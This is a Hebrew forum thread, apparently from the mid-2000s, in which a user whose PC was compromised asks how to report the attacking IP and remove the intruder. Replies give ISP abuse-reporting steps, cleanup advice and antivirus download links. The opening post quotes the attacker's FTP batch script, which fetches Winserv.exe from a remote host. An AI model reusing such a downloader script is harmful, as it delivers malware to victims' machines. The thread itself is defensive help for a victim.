היום שמתי לב שפרצו לי למחשב יש לי כמה קבצים מוזרים כמו 1.bat שבפנים יש משהו כזה

open xx.xx.xx.xx 28630

user Ax Ax

get Winserv.exe

quit

ויש מלא קבצים של FTP יענו שפתחו לי FTP על המחשב וניסיתי למחוק אבל הם חזרו.

שאלה 2 והיא בעצם הכי חשובה - האיפי המצונזר למעלה, הוא ישראלי, של ברק, אני מעוניין לדווח להם על זה, לאן לפנות?

http://www.013.net/heb/support.asp?pid=54&cid=90&sid=116&rshow=yes&redir=/heb/files/html/guard-against-hacking-info.html

תלחץ על "לפרטים והמלצות התגוננות מפני פריצות וחדירות למחשב אנא לחצו כאן" ותגלול את העמוד שנפתח עד הסוף.

יצירת ושליחת התלונה לאחראי על כתובת ה-IP

כאשר תשלחו את התלונה בדואר אלקטרוני לכתובת של האחראי על כתובת ה-IP שבאמצעותה בוצע ניסיון הפריצה, חשוב לכלול בהודעה מספר דברים:

מומלץ לרשום בשורת הנושא (Subject) מילה או שתיים שיאפיינו את ההודעה. דוגמאות אפשריות הן:

Hack, Scan,Intruder.

מומלץ לרשום בגוף ההודעה מספר מילים אודות כתובת ה-IP אשר עליה אתם מתלוננים וניתן, אם רוצים (לא חייבים) ,לרשום מסר אישי, יחד עם זאת חשוב שתזכרו שאתם פונים לגוף מקצועי שמטרתו לסייע בטיפול בבעיה ושאינו אחראי ברוב המקרים על הניסיון שבוצע, לכן חשוב להקפיד על נימוס וקורקטיות.

חשוב ביותר להדביק בגוף ההודעה את החלק הרלוונטי מהלוג. הלוג הוא ההוכחה לניסיון הפריצה. העברת תלונה ללא המידע מהלוג חסרת משמעות ולרוב לא תענה.

אנא הקפידו לשלוח רק את הקטע הרלוונטי מהלוג שקשור לאותה חברה ולא מעבר לו.

כמו כן, אנא שימו לב שהפרטים בלוג כוללים את תאריך ושעת האירוע, כתובת ה-IP של המתקיף וה-Port אשר אליו ניסו להתחבר. חשוב גם לציין בגוף ההודעה את היחס בין שעון ישראל לשעון הבינלאומי כך שמי שיקבל את הלוג יוכל לחשב את התאריך והשעה לזמן שלו.

בקיץ יש להוסיף על שעון ישראל שלוש שעות ולכן יש לרשום בהודעה GMT+3. בחורף מוסיפים לשעון שעתיים ולכן יש לרשום GMT+2.

במידה ואתם מתקשים באיתור הגורם האחראי על מקור הפריצה, אנא שלחו הודעת דואר אלקטרוני (עם אותם פרטים אשר תוארו לעיל) לצוות האביוז של "013 ברק" אשר כתובתו :

abuse@013barak.net.il

אנו נבחן את התלונה וננסה לאתר ולהעביר את פרטיה לגורם האחראי על מקור ניסיון הפריצה.

כן, ראיתי את זה. פשוט עד לפני כמה דקות ה IE שלי היה מושבת וחיכיתי שחבר שלי ישלח לי FF אז בכל מקרה, שלחתי להם הודעה. בנתיים, איך אני יכול להעיף אותו מהמחשב? (אני לא רוצה למחוק תקבצים, אני צריך להשאיר אותם)

קודם כל במקרים כאלה הדרך הכי בטוחה לא להיפגע עוד יותר היא פשוט לא להתחבר ל@ ולנסות לפתור את הבעיה offline.

לפי איך שזה נראה באמת הצליחו להריץ לך קובץ במחשב, ואולי הוא  מנסה ליצור קשר עם מחשב אחר.

*תבדוק לשינויים ברג'יסטרי, וגם בתיקיית startup של windows (דרך התחל--> תוכניות וכו..) כי יכול להיות שהקוד מורץ בכל התחלה של המחשב.

*כדאי גם ליתר ביטחון לבדוק לוירוסים, תוכנות ריגול.

*נסה לבדוק בלוגים שונים אם יש משהו חריג - ואולי תוכל לראות שינויים בקבצים או בREG ולתקן.

*אפשר גם להחזיר את המערכת למצב קודם ע"י חזרה לRestore Point (בהנחה שיש לך win XP)

*כדאי שתבדוק גם אם הפיירוול שלך פועל, ואם אין לך - תתקין אחד בדחיפות כי יכולים לקרות דברים לא נעימים אם אין

העניין הוא שכשזה כבר נכנס, עד כמה שהוא ינסה למחוק את זה, ואפילו שנראה שזה נמחק אתה לא יכול לדעת בוודאות.

אני הייתי הולך על פורמט מלא במקרה הזה.

כן, אני רק מחכה לתגובה של ברק לפני הפירמוט.

בכל מקרה איפה לחפש בריגסטרי?

אני פשוט מעוניין זמנית לנטרל את הגישה שלהם

לא בטוח שזה ברג'יסטרי, זה יכול לבוא במגוון דרכים ובמקומות שלא תבחין.

מה שכתבתי למעלה הוא בגדר המלצה כיצד להתנהג לאחר גילוי או חשד לפריצה, כמובן שShuy צודק והפתרון האידיאלי הוא למחוק את המחשב מכל תוכנו [FORMAT] כדי להיות בטוחים שזה לא יחזור, ושזה נמחק לחלוטין (למרות שיש דרך לעקוף את זה - אבל זה כבר לא סביר).

אחי זה שתדווח להם לא כל כך יעזור לך

לי גם פרצו והיה לי תאיפי שלהם (משהו מנטוויזן וגם לי יש נטוויזן)

והקיצר הם התחילו להגן עליו

אמרו לי שאולי יש לו במחשב וירווס ווהוירוס שיש לו אולי ניסה להיכנס לי למחשב

והם אמרו שהם ישלחו לו אזהרה

הקיצר לא נראה לי שיש כל כך מה לעשוות

במידה ולא תרצה לפרמט הנה מספר תוכנות שאספתי כולם חינמיות ומעודכנות.

תוכנות להסרת ספיי וור

=================

Microsoft Windows AntiSpyware

http://www.microsoft.com/downloads/details.aspx?FamilyID=321cd7a2-6a57-4c57-a8bd-dbf62eda9671&displaylang=en&Hash=PFB8X74

Ad-Aware

http://www.snapfiles.com/php/download.php?id=100156&a=7117402&tag=2636408&loc=1

Spybot - Search & Destroy

http://www.snapfiles.com/php/download.php?id=105384&a=7115596&tag=4354084&loc=1

EMCO Malware Bouncer

http://www.snapfiles.com/php/download.php?id=108721&a=7112264&tag=3201229&loc=1

CWShredder

http://users.tapuz.co.il/techsupport/spyware/files/CWS.zip

להגנה על הדפדפן

===========

SpywareBlaster

http://www.snapfiles.com/php/download.php?id=105693&a=7116149&tag=2513056&loc=1

Hijackthis

http://www.snapfiles.com/php/download.php?id=106738&a=7119473&tag=212849&loc=1

להסרת תולעים

==========

McAfee AVERT Stinger

http://www.snapfiles.com/php/download.php?id=107401&a=7120939&tag=1006087&loc=1

אנטי וירוס

==========

AntiVir PE

http://www.snapfiles.com/php/download.php?id=100279&a=7116067&tag=6324224&loc=1

avast! Home Edition

http://www.snapfiles.com/php/download.php?id=105009&a=7114399&tag=9231616&loc=1

Avg Anti-Virus

http://www.grisoft.cz/softw/70/filedir/inst/avg70f_308a466.exe

================================================

אחי זה שתדווח להם לא כל כך יעזור לך

לי גם פרצו והיה לי תאיפי שלהם (משהו מנטוויזן וגם לי יש נטוויזן)

והקיצר הם התחילו להגן עליו

אמרו לי שאולי יש לו במחשב וירווס ווהוירוס שיש לו אולי ניסה להיכנס לי למחשב

והם אמרו שהם ישלחו לו אזהרה

הקיצר לא נראה לי שיש כל כך מה לעשוות

מה ציפית, שיתבעו אותו? אתה מודע לכמות האנשים שאינם הקהל הקבוע של האתר, שהמחשב שלהם פרוץ כמו גבינה שוויצרית והם מפיצים וירוסים 24 שעות ביממה? אי אפשר לדעת בוודאות שמישהו עשה את זה בכוונה, אלא אם כן מדווחים על מישהו מסויים הרבה אנשים ואז הספק יכול פשוט לנתק אותו עד שיטפל בבעיה (בד"כ יש סעיף כזה בחוזה שלך עם הספק).